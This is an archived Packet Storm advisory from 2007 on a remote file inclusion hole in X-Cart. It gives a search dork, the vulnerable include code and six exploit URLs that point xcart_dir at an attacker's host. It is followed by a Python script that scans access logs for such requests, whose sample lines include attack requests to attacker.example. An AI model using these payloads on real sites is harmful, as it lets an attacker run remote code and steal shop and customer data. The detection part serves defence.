xcart-rfi.txt

Date: 11 Sep 2007 | Reported by: aLiiF | Type: packetstorm | Source: packetstormsecurity.com

xCart remote file inclusion vulnerability. The exploit allows remote attackers to include and execute arbitrary files via xcart-path/config.php, xcart-path/prepare.php, xcart-path/smarty.php, xcart-path/customer/product.php, xcart-path/provider/auth.php, or xcart-path/admin/auth.php.

Code
`## xCart Remote file inclusion ##  
  
## Download script : http://www.x-cart.com//  
  
## Discovered By : aLiiF a.k.a [arif] @debuteam 07/09/2007  
  
## HomePage : http://www.debuteam.net//  
  
## Thx to : Debu Newbie Payment Yogac nyubi Rozi ^S0n_g0ku^  
Kuris Sonix Toxicity newbi3 R4yn4ld0 DisJocKey  
s3ng0k home_edition Holong home_edition2001  
th0nk Scr3W_W0rm jayoes and aLL @Debutem @Mildnet  
  
  
  
  
  
  
/*****************************************************************************\  
+-----------------------------------------------------------------------------+  
| X-Cart |  
| Copyright (c) 2001-2004 Ruslan R. Fazliev <[email protected]> |  
| All rights reserved. |  
+-----------------------------------------------------------------------------+  
#  
# $Id: config.php,v 1.297.2.9 2004/02/05 12:25:43 mclap Exp $  
#  
# Global definitions & common functions  
#  
  
@include $xcart_dir."/prepare.php";  
  
#  
# Create Smarty object  
#  
if (!@include $xcart_dir."/smarty.php") {  
  
  
#################################################################################  
  
  
## Dork : "X-CART. Powerful PHP shopping cart software" ##  
## ##  
  
  
=-=-=-=-= () ExPloit () =-=-=-=-= =-=-=-=-= () ExPloit () =-=-=-=-=  
  
  
## http://www.target.com/[xcart-path]/config.php?xcart_dir=http://urhost/[inject]?  
## http://www.target.com/[xcart-path]/prepare.php?xcart_dir=http://urhost/[inject]?  
## http://www.target.com/[xcart-path]/smarty.php?xcart_dir=http://urhost/[inject]?  
## http://www.target.com/[xcart-path]/customer/product.php?xcart_dir=http://urhost/[inject]?  
## http://www.target.com/[xcart-path]/provider/auth.php?xcart_dir=http://urhost/[inject]?  
## http://www.target.com/[xcart-path]/admin/auth.php?xcart_dir=http://urhost/[inject]?  
  
===================================================================  
  
  
## Contact person : [email protected]  
  
## ViVa Debuteam !!!   
  
`
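For defenders, the request pattern in the advisory can be hunted in web server access logs. The following is an added example, not part of the original advisory or of X-Cart; it assumes common/combined log format, and the function names, log lines and hostnames are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Scripts the advisory lists as including files relative to xcart_dir.
AFFECTED = ("config.php", "prepare.php", "smarty.php",
            "customer/product.php", "provider/auth.php", "admin/auth.php")
# A legitimate xcart_dir is a local path; a URL or stream scheme is suspect.
SCHEME = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*://|data:)", re.I)
# Request line inside a common/combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Constructed sample log lines (documentation addresses and hostnames).
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Sep/2007:10:00:01 +0000] "GET /shop/config.php?xcart_dir=http://attacker.example/x.txt? HTTP/1.1" 200 512',
    '203.0.113.7 - - [11/Sep/2007:10:00:02 +0000] "GET /shop/admin/auth.php?xcart_dir=%2568ttp%253A%252F%252Fattacker.example%252Fx? HTTP/1.1" 200 512',
    '198.51.100.4 - - [11/Sep/2007:10:00:03 +0000] "GET /shop/customer/product.php?productid=17 HTTP/1.1" 200 9000',
    '198.51.100.4 - - [11/Sep/2007:10:00:04 +0000] "GET /shop/search.php?xcart_dir=/var/www/shop HTTP/1.1" 200 100',
]

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %2568ttp) used to slip past filters."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def check_line(line):
    """Return (path, decoded xcart_dir, listed_in_advisory) for a suspicious request, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        # PHP rewrites '.' and ' ' in parameter names to '_', so normalize first.
        if key.replace(".", "_").replace(" ", "_") != "xcart_dir":
            continue
        value = fully_decode(value)
        if SCHEME.match(value):
            return url.path, value, url.path.lower().endswith(AFFECTED)
    return None

def scan(lines):
    """Collect every suspicious request found in an iterable of log lines."""
    return [hit for hit in map(check_line, lines) if hit]

if __name__ == "__main__":
    for path, value, listed in scan(SAMPLE_LOG):
        print(f"RFI attempt: {path} xcart_dir={value!r} listed={listed}")
```

A hit on a script outside the advisory's list is still worth reviewing, since any file that builds an include path from `$xcart_dir` shares the pattern.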
